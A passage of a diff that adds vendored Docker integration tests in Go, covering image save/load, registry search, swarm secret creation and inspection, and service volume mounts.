+ exec.Command("xz", "-c"), + exec.Command("gzip", "-c")) + c.Assert(err, checker.IsNil, check.Commentf("failed to save repo: %v %v", out, err)) + + deleteImages(repoName) + + loadCmd := exec.Command(dockerBinary, "load") + loadCmd.Stdin = strings.NewReader(out) + out, _, err = runCommandWithOutput(loadCmd) + c.Assert(err, checker.NotNil, check.Commentf("expected error, but succeeded with no error and output: %v", out)) + + after, _, err := dockerCmdWithError("inspect", repoName) + c.Assert(err, checker.NotNil, check.Commentf("the repo should not exist: %v", after)) +} + +func (s *DockerSuite) TestSaveSingleTag(c *check.C) { + testRequires(c, DaemonIsLinux) + repoName := "foobar-save-single-tag-test" + dockerCmd(c, "tag", "busybox:latest", fmt.Sprintf("%v:latest", repoName)) + + out, _ := dockerCmd(c, "images", "-q", "--no-trunc", repoName) + cleanedImageID := strings.TrimSpace(out) + + out, _, err := runCommandPipelineWithOutput( + exec.Command(dockerBinary, 
"save", fmt.Sprintf("%v:latest", repoName)), + exec.Command("tar", "t"), + exec.Command("grep", "-E", fmt.Sprintf("(^repositories$|%v)", cleanedImageID))) + c.Assert(err, checker.IsNil, check.Commentf("failed to save repo with image ID and 'repositories' file: %s, %v", out, err)) +} + +func (s *DockerSuite) TestSaveCheckTimes(c *check.C) { + testRequires(c, DaemonIsLinux) + repoName := "busybox:latest" + out, _ := dockerCmd(c, "inspect", repoName) + data := []struct { + ID string + Created time.Time + }{} + err := json.Unmarshal([]byte(out), &data) + c.Assert(err, checker.IsNil, check.Commentf("failed to marshal from %q: err %v", repoName, err)) + c.Assert(len(data), checker.Not(checker.Equals), 0, check.Commentf("failed to marshal the data from %q", repoName)) + tarTvTimeFormat := "2006-01-02 15:04" + out, _, err = runCommandPipelineWithOutput( + exec.Command(dockerBinary, "save", repoName), + exec.Command("tar", "tv"), + exec.Command("grep", "-E", fmt.Sprintf("%s %s", data[0].Created.Format(tarTvTimeFormat), digest.Digest(data[0].ID).Hex()))) + c.Assert(err, checker.IsNil, check.Commentf("failed to save repo with image ID and 'repositories' file: %s, %v", out, err)) +} + +func (s *DockerSuite) TestSaveImageId(c *check.C) { + testRequires(c, DaemonIsLinux) + repoName := "foobar-save-image-id-test" + dockerCmd(c, "tag", "emptyfs:latest", fmt.Sprintf("%v:latest", repoName)) + + out, _ := dockerCmd(c, "images", "-q", "--no-trunc", repoName) + cleanedLongImageID := strings.TrimPrefix(strings.TrimSpace(out), "sha256:") + + out, _ = dockerCmd(c, "images", "-q", repoName) + cleanedShortImageID := strings.TrimSpace(out) + + // Make sure IDs are not empty + c.Assert(cleanedLongImageID, checker.Not(check.Equals), "", check.Commentf("Id should not be empty.")) + c.Assert(cleanedShortImageID, checker.Not(check.Equals), "", check.Commentf("Id should not be empty.")) + + saveCmd := exec.Command(dockerBinary, "save", cleanedShortImageID) + tarCmd := exec.Command("tar", "t") + + 
var err error + tarCmd.Stdin, err = saveCmd.StdoutPipe() + c.Assert(err, checker.IsNil, check.Commentf("cannot set stdout pipe for tar: %v", err)) + grepCmd := exec.Command("grep", cleanedLongImageID) + grepCmd.Stdin, err = tarCmd.StdoutPipe() + c.Assert(err, checker.IsNil, check.Commentf("cannot set stdout pipe for grep: %v", err)) + + c.Assert(tarCmd.Start(), checker.IsNil, check.Commentf("tar failed with error: %v", err)) + c.Assert(saveCmd.Start(), checker.IsNil, check.Commentf("docker save failed with error: %v", err)) + defer func() { + saveCmd.Wait() + tarCmd.Wait() + dockerCmd(c, "rmi", repoName) + }() + + out, _, err = runCommandWithOutput(grepCmd) + + c.Assert(err, checker.IsNil, check.Commentf("failed to save repo with image ID: %s, %v", out, err)) +} + +// save a repo and try to load it using flags +func (s *DockerSuite) TestSaveAndLoadRepoFlags(c *check.C) { + testRequires(c, DaemonIsLinux) + name := "test-save-and-load-repo-flags" + dockerCmd(c, "run", "--name", name, "busybox", "true") + + repoName := "foobar-save-load-test" + + deleteImages(repoName) + dockerCmd(c, "commit", name, repoName) + + before, _ := dockerCmd(c, "inspect", repoName) + + out, _, err := runCommandPipelineWithOutput( + exec.Command(dockerBinary, "save", repoName), + exec.Command(dockerBinary, "load")) + c.Assert(err, checker.IsNil, check.Commentf("failed to save and load repo: %s, %v", out, err)) + + after, _ := dockerCmd(c, "inspect", repoName) + c.Assert(before, checker.Equals, after, check.Commentf("inspect is not the same after a save / load")) +} + +func (s *DockerSuite) TestSaveWithNoExistImage(c *check.C) { + testRequires(c, DaemonIsLinux) + + imgName := "foobar-non-existing-image" + + out, _, err := dockerCmdWithError("save", "-o", "test-img.tar", imgName) + c.Assert(err, checker.NotNil, check.Commentf("save image should fail for non-existing image")) + c.Assert(out, checker.Contains, fmt.Sprintf("No such image: %s", imgName)) +} + +func (s *DockerSuite) 
TestSaveMultipleNames(c *check.C) { + testRequires(c, DaemonIsLinux) + repoName := "foobar-save-multi-name-test" + + // Make one image + dockerCmd(c, "tag", "emptyfs:latest", fmt.Sprintf("%v-one:latest", repoName)) + + // Make two images + dockerCmd(c, "tag", "emptyfs:latest", fmt.Sprintf("%v-two:latest", repoName)) + + out, _, err := runCommandPipelineWithOutput( + exec.Command(dockerBinary, "save", fmt.Sprintf("%v-one", repoName), fmt.Sprintf("%v-two:latest", repoName)), + exec.Command("tar", "xO", "repositories"), + exec.Command("grep", "-q", "-E", "(-one|-two)"), + ) + c.Assert(err, checker.IsNil, check.Commentf("failed to save multiple repos: %s, %v", out, err)) +} + +func (s *DockerSuite) TestSaveRepoWithMultipleImages(c *check.C) { + testRequires(c, DaemonIsLinux) + makeImage := func(from string, tag string) string { + var ( + out string + ) + out, _ = dockerCmd(c, "run", "-d", from, "true") + cleanedContainerID := strings.TrimSpace(out) + + out, _ = dockerCmd(c, "commit", cleanedContainerID, tag) + imageID := strings.TrimSpace(out) + return imageID + } + + repoName := "foobar-save-multi-images-test" + tagFoo := repoName + ":foo" + tagBar := repoName + ":bar" + + idFoo := makeImage("busybox:latest", tagFoo) + idBar := makeImage("busybox:latest", tagBar) + + deleteImages(repoName) + + // create the archive + out, _, err := runCommandPipelineWithOutput( + exec.Command(dockerBinary, "save", repoName, "busybox:latest"), + exec.Command("tar", "t")) + c.Assert(err, checker.IsNil, check.Commentf("failed to save multiple images: %s, %v", out, err)) + + lines := strings.Split(strings.TrimSpace(out), "\n") + var actual []string + for _, l := range lines { + if regexp.MustCompile("^[a-f0-9]{64}\\.json$").Match([]byte(l)) { + actual = append(actual, strings.TrimSuffix(l, ".json")) + } + } + + // make the list of expected layers + out = inspectField(c, "busybox:latest", "Id") + expected := []string{strings.TrimSpace(out), idFoo, idBar} + + // prefixes are not in tar + 
for i := range expected { + expected[i] = digest.Digest(expected[i]).Hex() + } + + sort.Strings(actual) + sort.Strings(expected) + c.Assert(actual, checker.DeepEquals, expected, check.Commentf("archive does not contains the right layers: got %v, expected %v, output: %q", actual, expected, out)) +} + +// Issue #6722 #5892 ensure directories are included in changes +func (s *DockerSuite) TestSaveDirectoryPermissions(c *check.C) { + testRequires(c, DaemonIsLinux) + layerEntries := []string{"opt/", "opt/a/", "opt/a/b/", "opt/a/b/c"} + layerEntriesAUFS := []string{"./", ".wh..wh.aufs", ".wh..wh.orph/", ".wh..wh.plnk/", "opt/", "opt/a/", "opt/a/b/", "opt/a/b/c"} + + name := "save-directory-permissions" + tmpDir, err := ioutil.TempDir("", "save-layers-with-directories") + c.Assert(err, checker.IsNil, check.Commentf("failed to create temporary directory: %s", err)) + extractionDirectory := filepath.Join(tmpDir, "image-extraction-dir") + os.Mkdir(extractionDirectory, 0777) + + defer os.RemoveAll(tmpDir) + _, err = buildImage(name, + `FROM busybox + RUN adduser -D user && mkdir -p /opt/a/b && chown -R user:user /opt/a + RUN touch /opt/a/b/c && chown user:user /opt/a/b/c`, + true) + c.Assert(err, checker.IsNil, check.Commentf("%v", err)) + + out, _, err := runCommandPipelineWithOutput( + exec.Command(dockerBinary, "save", name), + exec.Command("tar", "-xf", "-", "-C", extractionDirectory), + ) + c.Assert(err, checker.IsNil, check.Commentf("failed to save and extract image: %s", out)) + + dirs, err := ioutil.ReadDir(extractionDirectory) + c.Assert(err, checker.IsNil, check.Commentf("failed to get a listing of the layer directories: %s", err)) + + found := false + for _, entry := range dirs { + var entriesSansDev []string + if entry.IsDir() { + layerPath := filepath.Join(extractionDirectory, entry.Name(), "layer.tar") + + f, err := os.Open(layerPath) + c.Assert(err, checker.IsNil, check.Commentf("failed to open %s: %s", layerPath, err)) + defer f.Close() + + entries, err := 
listTar(f) + for _, e := range entries { + if !strings.Contains(e, "dev/") { + entriesSansDev = append(entriesSansDev, e) + } + } + c.Assert(err, checker.IsNil, check.Commentf("encountered error while listing tar entries: %s", err)) + + if reflect.DeepEqual(entriesSansDev, layerEntries) || reflect.DeepEqual(entriesSansDev, layerEntriesAUFS) { + found = true + break + } + } + } + + c.Assert(found, checker.Equals, true, check.Commentf("failed to find the layer with the right content listing")) + +} + +// Test loading a weird image where one of the layers is of zero size. +// The layer.tar file is actually zero bytes, no padding or anything else. +// See issue: 18170 +func (s *DockerSuite) TestLoadZeroSizeLayer(c *check.C) { + testRequires(c, DaemonIsLinux) + + dockerCmd(c, "load", "-i", "fixtures/load/emptyLayer.tar") +} + +func (s *DockerSuite) TestSaveLoadParents(c *check.C) { + testRequires(c, DaemonIsLinux) + + makeImage := func(from string, addfile string) string { + var ( + out string + ) + out, _ = dockerCmd(c, "run", "-d", from, "touch", addfile) + cleanedContainerID := strings.TrimSpace(out) + + out, _ = dockerCmd(c, "commit", cleanedContainerID) + imageID := strings.TrimSpace(out) + + dockerCmd(c, "rm", "-f", cleanedContainerID) + return imageID + } + + idFoo := makeImage("busybox", "foo") + idBar := makeImage(idFoo, "bar") + + tmpDir, err := ioutil.TempDir("", "save-load-parents") + c.Assert(err, checker.IsNil) + defer os.RemoveAll(tmpDir) + + c.Log("tmpdir", tmpDir) + + outfile := filepath.Join(tmpDir, "out.tar") + + dockerCmd(c, "save", "-o", outfile, idBar, idFoo) + dockerCmd(c, "rmi", idBar) + dockerCmd(c, "load", "-i", outfile) + + inspectOut := inspectField(c, idBar, "Parent") + c.Assert(inspectOut, checker.Equals, idFoo) + + inspectOut = inspectField(c, idFoo, "Parent") + c.Assert(inspectOut, checker.Equals, "") +} + +func (s *DockerSuite) TestSaveLoadNoTag(c *check.C) { + testRequires(c, DaemonIsLinux) + + name := "saveloadnotag" + + _, err := 
buildImage(name, "FROM busybox\nENV foo=bar", true) + c.Assert(err, checker.IsNil, check.Commentf("%v", err)) + + id := inspectField(c, name, "Id") + + // Test to make sure that save w/o name just shows imageID during load + out, _, err := runCommandPipelineWithOutput( + exec.Command(dockerBinary, "save", id), + exec.Command(dockerBinary, "load")) + c.Assert(err, checker.IsNil, check.Commentf("failed to save and load repo: %s, %v", out, err)) + + // Should not show 'name' but should show the image ID during the load + c.Assert(out, checker.Not(checker.Contains), "Loaded image: ") + c.Assert(out, checker.Contains, "Loaded image ID:") + c.Assert(out, checker.Contains, id) + + // Test to make sure that save by name shows that name during load + out, _, err = runCommandPipelineWithOutput( + exec.Command(dockerBinary, "save", name), + exec.Command(dockerBinary, "load")) + c.Assert(err, checker.IsNil, check.Commentf("failed to save and load repo: %s, %v", out, err)) + c.Assert(out, checker.Contains, "Loaded image: "+name+":latest") + c.Assert(out, checker.Not(checker.Contains), "Loaded image ID:") +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_save_load_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_save_load_unix_test.go new file mode 100644 index 0000000000..22445e5bbe --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_save_load_unix_test.go @@ -0,0 +1,109 @@ +// +build !windows + +package main + +import ( + "context" + "fmt" + "io/ioutil" + "os" + "os/exec" + "strings" + "time" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" + "github.com/kr/pty" +) + +// save a repo and try to load it using stdout +func (s *DockerSuite) TestSaveAndLoadRepoStdout(c *check.C) { + name := "test-save-and-load-repo-stdout" + dockerCmd(c, "run", "--name", name, "busybox", "true") + + repoName := "foobar-save-load-test" + before, _ := dockerCmd(c, "commit", name, repoName) 
+ before = strings.TrimRight(before, "\n") + + tmpFile, err := ioutil.TempFile("", "foobar-save-load-test.tar") + c.Assert(err, check.IsNil) + defer os.Remove(tmpFile.Name()) + + saveCmd := exec.Command(dockerBinary, "save", repoName) + saveCmd.Stdout = tmpFile + + _, err = runCommand(saveCmd) + c.Assert(err, check.IsNil) + + tmpFile, err = os.Open(tmpFile.Name()) + c.Assert(err, check.IsNil) + defer tmpFile.Close() + + deleteImages(repoName) + + loadCmd := exec.Command(dockerBinary, "load") + loadCmd.Stdin = tmpFile + + out, _, err := runCommandWithOutput(loadCmd) + c.Assert(err, check.IsNil, check.Commentf(out)) + + after := inspectField(c, repoName, "Id") + after = strings.TrimRight(after, "\n") + + c.Assert(after, check.Equals, before) //inspect is not the same after a save / load + + deleteImages(repoName) + + pty, tty, err := pty.Open() + c.Assert(err, check.IsNil) + cmd := exec.Command(dockerBinary, "save", repoName) + cmd.Stdin = tty + cmd.Stdout = tty + cmd.Stderr = tty + c.Assert(cmd.Start(), check.IsNil) + c.Assert(cmd.Wait(), check.NotNil) //did not break writing to a TTY + + buf := make([]byte, 1024) + + n, err := pty.Read(buf) + c.Assert(err, check.IsNil) //could not read tty output + c.Assert(string(buf[:n]), checker.Contains, "Cowardly refusing", check.Commentf("help output is not being yielded", out)) +} + +func (s *DockerSuite) TestSaveAndLoadWithProgressBar(c *check.C) { + name := "test-load" + _, err := buildImage(name, ` + FROM busybox + RUN touch aa + `, true) + c.Assert(err, check.IsNil) + + tmptar := name + ".tar" + dockerCmd(c, "save", "-o", tmptar, name) + defer os.Remove(tmptar) + + dockerCmd(c, "rmi", name) + dockerCmd(c, "tag", "busybox", name) + out, _ := dockerCmd(c, "load", "-i", tmptar) + expected := fmt.Sprintf("The image %s:latest already exists, renaming the old one with ID", name) + c.Assert(out, checker.Contains, expected) +} + +// fail because load didn't receive data from stdin +func (s *DockerSuite) TestLoadNoStdinFail(c 
*check.C) { + pty, tty, err := pty.Open() + c.Assert(err, check.IsNil) + ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second) + defer cancel() + cmd := exec.CommandContext(ctx, dockerBinary, "load") + cmd.Stdin = tty + cmd.Stdout = tty + cmd.Stderr = tty + c.Assert(cmd.Run(), check.NotNil) // docker-load should fail + + buf := make([]byte, 1024) + + n, err := pty.Read(buf) + c.Assert(err, check.IsNil) //could not read tty output + c.Assert(string(buf[:n]), checker.Contains, "requested load from stdin, but stdin is empty") +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_search_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_search_test.go new file mode 100644 index 0000000000..5a32f2ab93 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_search_test.go @@ -0,0 +1,131 @@ +package main + +import ( + "fmt" + "strings" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +// search for repos named "registry" on the central registry +func (s *DockerSuite) TestSearchOnCentralRegistry(c *check.C) { + testRequires(c, Network, DaemonIsLinux) + + out, _ := dockerCmd(c, "search", "busybox") + c.Assert(out, checker.Contains, "Busybox base image.", check.Commentf("couldn't find any repository named (or containing) 'Busybox base image.'")) +} + +func (s *DockerSuite) TestSearchStarsOptionWithWrongParameter(c *check.C) { + out, _, err := dockerCmdWithError("search", "--filter", "stars=a", "busybox") + c.Assert(err, check.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "Invalid filter", check.Commentf("couldn't find the invalid filter warning")) + + out, _, err = dockerCmdWithError("search", "-f", "stars=a", "busybox") + c.Assert(err, check.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "Invalid filter", check.Commentf("couldn't find the invalid filter warning")) + + out, _, err = dockerCmdWithError("search", "-f", 
"is-automated=a", "busybox") + c.Assert(err, check.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "Invalid filter", check.Commentf("couldn't find the invalid filter warning")) + + out, _, err = dockerCmdWithError("search", "-f", "is-official=a", "busybox") + c.Assert(err, check.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "Invalid filter", check.Commentf("couldn't find the invalid filter warning")) + + // -s --stars deprecated since Docker 1.13 + out, _, err = dockerCmdWithError("search", "--stars=a", "busybox") + c.Assert(err, check.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "invalid syntax", check.Commentf("couldn't find the invalid value warning")) + + // -s --stars deprecated since Docker 1.13 + out, _, err = dockerCmdWithError("search", "-s=-1", "busybox") + c.Assert(err, check.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "invalid syntax", check.Commentf("couldn't find the invalid value warning")) +} + +func (s *DockerSuite) TestSearchCmdOptions(c *check.C) { + testRequires(c, Network, DaemonIsLinux) + + out, _ := dockerCmd(c, "search", "--help") + c.Assert(out, checker.Contains, "Usage:\tdocker search [OPTIONS] TERM") + + outSearchCmd, _ := dockerCmd(c, "search", "busybox") + outSearchCmdNotrunc, _ := dockerCmd(c, "search", "--no-trunc=true", "busybox") + + c.Assert(len(outSearchCmd) > len(outSearchCmdNotrunc), check.Equals, false, check.Commentf("The no-trunc option can't take effect.")) + + outSearchCmdautomated, _ := dockerCmd(c, "search", "--filter", "is-automated=true", "busybox") //The busybox is a busybox base image, not an AUTOMATED image. 
+ outSearchCmdautomatedSlice := strings.Split(outSearchCmdautomated, "\n") + for i := range outSearchCmdautomatedSlice { + c.Assert(strings.HasPrefix(outSearchCmdautomatedSlice[i], "busybox "), check.Equals, false, check.Commentf("The busybox is not an AUTOMATED image: %s", outSearchCmdautomated)) + } + + outSearchCmdNotOfficial, _ := dockerCmd(c, "search", "--filter", "is-official=false", "busybox") //The busybox is a busybox base image, official image. + outSearchCmdNotOfficialSlice := strings.Split(outSearchCmdNotOfficial, "\n") + for i := range outSearchCmdNotOfficialSlice { + c.Assert(strings.HasPrefix(outSearchCmdNotOfficialSlice[i], "busybox "), check.Equals, false, check.Commentf("The busybox is not an OFFICIAL image: %s", outSearchCmdNotOfficial)) + } + + outSearchCmdOfficial, _ := dockerCmd(c, "search", "--filter", "is-official=true", "busybox") //The busybox is a busybox base image, official image. + outSearchCmdOfficialSlice := strings.Split(outSearchCmdOfficial, "\n") + c.Assert(outSearchCmdOfficialSlice, checker.HasLen, 3) // 1 header, 1 line, 1 carriage return + c.Assert(strings.HasPrefix(outSearchCmdOfficialSlice[1], "busybox "), check.Equals, true, check.Commentf("The busybox is an OFFICIAL image: %s", outSearchCmdNotOfficial)) + + outSearchCmdStars, _ := dockerCmd(c, "search", "--filter", "stars=2", "busybox") + c.Assert(strings.Count(outSearchCmdStars, "[OK]") > strings.Count(outSearchCmd, "[OK]"), check.Equals, false, check.Commentf("The quantity of images with stars should be less than that of all images: %s", outSearchCmdStars)) + + dockerCmd(c, "search", "--filter", "is-automated=true", "--filter", "stars=2", "--no-trunc=true", "busybox") + + // --automated deprecated since Docker 1.13 + outSearchCmdautomated1, _ := dockerCmd(c, "search", "--automated=true", "busybox") //The busybox is a busybox base image, not an AUTOMATED image. 
+ outSearchCmdautomatedSlice1 := strings.Split(outSearchCmdautomated1, "\n") + for i := range outSearchCmdautomatedSlice1 { + c.Assert(strings.HasPrefix(outSearchCmdautomatedSlice1[i], "busybox "), check.Equals, false, check.Commentf("The busybox is not an AUTOMATED image: %s", outSearchCmdautomated)) + } + + // -s --stars deprecated since Docker 1.13 + outSearchCmdStars1, _ := dockerCmd(c, "search", "--stars=2", "busybox") + c.Assert(strings.Count(outSearchCmdStars1, "[OK]") > strings.Count(outSearchCmd, "[OK]"), check.Equals, false, check.Commentf("The quantity of images with stars should be less than that of all images: %s", outSearchCmdStars1)) + + // -s --stars deprecated since Docker 1.13 + dockerCmd(c, "search", "--stars=2", "--automated=true", "--no-trunc=true", "busybox") +} + +// search for repos which start with "ubuntu-" on the central registry +func (s *DockerSuite) TestSearchOnCentralRegistryWithDash(c *check.C) { + testRequires(c, Network, DaemonIsLinux) + + dockerCmd(c, "search", "ubuntu-") +} + +// test case for #23055 +func (s *DockerSuite) TestSearchWithLimit(c *check.C) { + testRequires(c, Network, DaemonIsLinux) + + limit := 10 + out, _, err := dockerCmdWithError("search", fmt.Sprintf("--limit=%d", limit), "docker") + c.Assert(err, checker.IsNil) + outSlice := strings.Split(out, "\n") + c.Assert(outSlice, checker.HasLen, limit+2) // 1 header, 1 carriage return + + limit = 50 + out, _, err = dockerCmdWithError("search", fmt.Sprintf("--limit=%d", limit), "docker") + c.Assert(err, checker.IsNil) + outSlice = strings.Split(out, "\n") + c.Assert(outSlice, checker.HasLen, limit+2) // 1 header, 1 carriage return + + limit = 100 + out, _, err = dockerCmdWithError("search", fmt.Sprintf("--limit=%d", limit), "docker") + c.Assert(err, checker.IsNil) + outSlice = strings.Split(out, "\n") + c.Assert(outSlice, checker.HasLen, limit+2) // 1 header, 1 carriage return + + limit = 0 + out, _, err = dockerCmdWithError("search", fmt.Sprintf("--limit=%d", limit), 
"docker") + c.Assert(err, checker.Not(checker.IsNil)) + + limit = 200 + out, _, err = dockerCmdWithError("search", fmt.Sprintf("--limit=%d", limit), "docker") + c.Assert(err, checker.Not(checker.IsNil)) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_secret_create_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_secret_create_test.go new file mode 100644 index 0000000000..b79fdbeb59 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_secret_create_test.go @@ -0,0 +1,131 @@ +// +build !windows + +package main + +import ( + "io/ioutil" + "os" + "strings" + + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +func (s *DockerSwarmSuite) TestSecretCreate(c *check.C) { + d := s.AddDaemon(c, true, true) + + testName := "test_secret" + id := d.createSecret(c, swarm.SecretSpec{ + swarm.Annotations{ + Name: testName, + }, + []byte("TESTINGDATA"), + }) + c.Assert(id, checker.Not(checker.Equals), "", check.Commentf("secrets: %s", id)) + + secret := d.getSecret(c, id) + c.Assert(secret.Spec.Name, checker.Equals, testName) +} + +func (s *DockerSwarmSuite) TestSecretCreateWithLabels(c *check.C) { + d := s.AddDaemon(c, true, true) + + testName := "test_secret" + id := d.createSecret(c, swarm.SecretSpec{ + swarm.Annotations{ + Name: testName, + Labels: map[string]string{ + "key1": "value1", + "key2": "value2", + }, + }, + []byte("TESTINGDATA"), + }) + c.Assert(id, checker.Not(checker.Equals), "", check.Commentf("secrets: %s", id)) + + secret := d.getSecret(c, id) + c.Assert(secret.Spec.Name, checker.Equals, testName) + c.Assert(len(secret.Spec.Labels), checker.Equals, 2) + c.Assert(secret.Spec.Labels["key1"], checker.Equals, "value1") + c.Assert(secret.Spec.Labels["key2"], checker.Equals, "value2") +} + +// Test case for 28884 +func (s *DockerSwarmSuite) TestSecretCreateResolve(c *check.C) { + d := s.AddDaemon(c, true, true) + + 
name := "foo" + id := d.createSecret(c, swarm.SecretSpec{ + swarm.Annotations{ + Name: name, + }, + []byte("foo"), + }) + c.Assert(id, checker.Not(checker.Equals), "", check.Commentf("secrets: %s", id)) + + fake := d.createSecret(c, swarm.SecretSpec{ + swarm.Annotations{ + Name: id, + }, + []byte("fake foo"), + }) + c.Assert(fake, checker.Not(checker.Equals), "", check.Commentf("secrets: %s", fake)) + + out, err := d.Cmd("secret", "ls") + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, name) + c.Assert(out, checker.Contains, fake) + + out, err = d.Cmd("secret", "rm", id) + c.Assert(out, checker.Contains, id) + + // Fake one will remain + out, err = d.Cmd("secret", "ls") + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Not(checker.Contains), name) + c.Assert(out, checker.Contains, fake) + + // Remove based on name prefix of the fake one + // (which is the same as the ID of foo one) should not work + // as search is only done based on: + // - Full ID + // - Full Name + // - Partial ID (prefix) + out, err = d.Cmd("secret", "rm", id[:5]) + c.Assert(out, checker.Not(checker.Contains), id) + out, err = d.Cmd("secret", "ls") + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Not(checker.Contains), name) + c.Assert(out, checker.Contains, fake) + + // Remove based on ID prefix of the fake one should succeed + out, err = d.Cmd("secret", "rm", fake[:5]) + c.Assert(out, checker.Contains, fake) + out, err = d.Cmd("secret", "ls") + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Not(checker.Contains), name) + c.Assert(out, checker.Not(checker.Contains), id) + c.Assert(out, checker.Not(checker.Contains), fake) +} + +func (s *DockerSwarmSuite) TestSecretCreateWithFile(c *check.C) { + d := s.AddDaemon(c, true, true) + + testFile, err := ioutil.TempFile("", "secretCreateTest") + c.Assert(err, checker.IsNil, check.Commentf("failed to create temporary file")) + defer os.Remove(testFile.Name()) + + testData := "TESTINGDATA" + _, err = 
testFile.Write([]byte(testData)) + c.Assert(err, checker.IsNil, check.Commentf("failed to write to temporary file")) + + testName := "test_secret" + out, err := d.Cmd("secret", "create", testName, testFile.Name()) + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "", check.Commentf(out)) + + id := strings.TrimSpace(out) + secret := d.getSecret(c, id) + c.Assert(secret.Spec.Name, checker.Equals, testName) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_secret_inspect_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_secret_inspect_test.go new file mode 100644 index 0000000000..0985a2bd59 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_secret_inspect_test.go @@ -0,0 +1,68 @@ +// +build !windows + +package main + +import ( + "encoding/json" + + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +func (s *DockerSwarmSuite) TestSecretInspect(c *check.C) { + d := s.AddDaemon(c, true, true) + + testName := "test_secret" + id := d.createSecret(c, swarm.SecretSpec{ + swarm.Annotations{ + Name: testName, + }, + []byte("TESTINGDATA"), + }) + c.Assert(id, checker.Not(checker.Equals), "", check.Commentf("secrets: %s", id)) + + secret := d.getSecret(c, id) + c.Assert(secret.Spec.Name, checker.Equals, testName) + + out, err := d.Cmd("secret", "inspect", testName) + c.Assert(err, checker.IsNil, check.Commentf(out)) + + var secrets []swarm.Secret + c.Assert(json.Unmarshal([]byte(out), &secrets), checker.IsNil) + c.Assert(secrets, checker.HasLen, 1) +} + +func (s *DockerSwarmSuite) TestSecretInspectMultiple(c *check.C) { + d := s.AddDaemon(c, true, true) + + testNames := []string{ + "test0", + "test1", + } + for _, n := range testNames { + id := d.createSecret(c, swarm.SecretSpec{ + swarm.Annotations{ + Name: n, + }, + []byte("TESTINGDATA"), + }) + c.Assert(id, 
checker.Not(checker.Equals), "", check.Commentf("secrets: %s", id)) + + secret := d.getSecret(c, id) + c.Assert(secret.Spec.Name, checker.Equals, n) + + } + + args := []string{ + "secret", + "inspect", + } + args = append(args, testNames...) + out, err := d.Cmd(args...) + c.Assert(err, checker.IsNil, check.Commentf(out)) + + var secrets []swarm.Secret + c.Assert(json.Unmarshal([]byte(out), &secrets), checker.IsNil) + c.Assert(secrets, checker.HasLen, 2) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_service_create_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_service_create_test.go new file mode 100644 index 0000000000..9e8b1e9956 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_service_create_test.go @@ -0,0 +1,175 @@ +// +build !windows + +package main + +import ( + "encoding/json" + "fmt" + "strings" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/mount" + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +func (s *DockerSwarmSuite) TestServiceCreateMountVolume(c *check.C) { + d := s.AddDaemon(c, true, true) + out, err := d.Cmd("service", "create", "--mount", "type=volume,source=foo,target=/foo,volume-nocopy", "busybox", "top") + c.Assert(err, checker.IsNil, check.Commentf(out)) + id := strings.TrimSpace(out) + + var tasks []swarm.Task + waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) { + tasks = d.getServiceTasks(c, id) + return len(tasks) > 0, nil + }, checker.Equals, true) + + task := tasks[0] + waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) { + if task.NodeID == "" || task.Status.ContainerStatus.ContainerID == "" { + task = d.getTask(c, task.ID) + } + return task.NodeID != "" && task.Status.ContainerStatus.ContainerID != "", nil + }, checker.Equals, true) + + // 
check container mount config + out, err = s.nodeCmd(c, task.NodeID, "inspect", "--format", "{{json .HostConfig.Mounts}}", task.Status.ContainerStatus.ContainerID) + c.Assert(err, checker.IsNil, check.Commentf(out)) + + var mountConfig []mount.Mount + c.Assert(json.Unmarshal([]byte(out), &mountConfig), checker.IsNil) + c.Assert(mountConfig, checker.HasLen, 1) + + c.Assert(mountConfig[0].Source, checker.Equals, "foo") + c.Assert(mountConfig[0].Target, checker.Equals, "/foo") + c.Assert(mountConfig[0].Type, checker.Equals, mount.TypeVolume) + c.Assert(mountConfig[0].VolumeOptions, checker.NotNil) + c.Assert(mountConfig[0].VolumeOptions.NoCopy, checker.True) + + // check container mounts actual + out, err = s.nodeCmd(c, task.NodeID, "inspect", "--format", "{{json .Mounts}}", task.Status.ContainerStatus.ContainerID) + c.Assert(err, checker.IsNil, check.Commentf(out)) + + var mounts []types.MountPoint + c.Assert(json.Unmarshal([]byte(out), &mounts), checker.IsNil) + c.Assert(mounts, checker.HasLen, 1) + + c.Assert(mounts[0].Type, checker.Equals, mount.TypeVolume) + 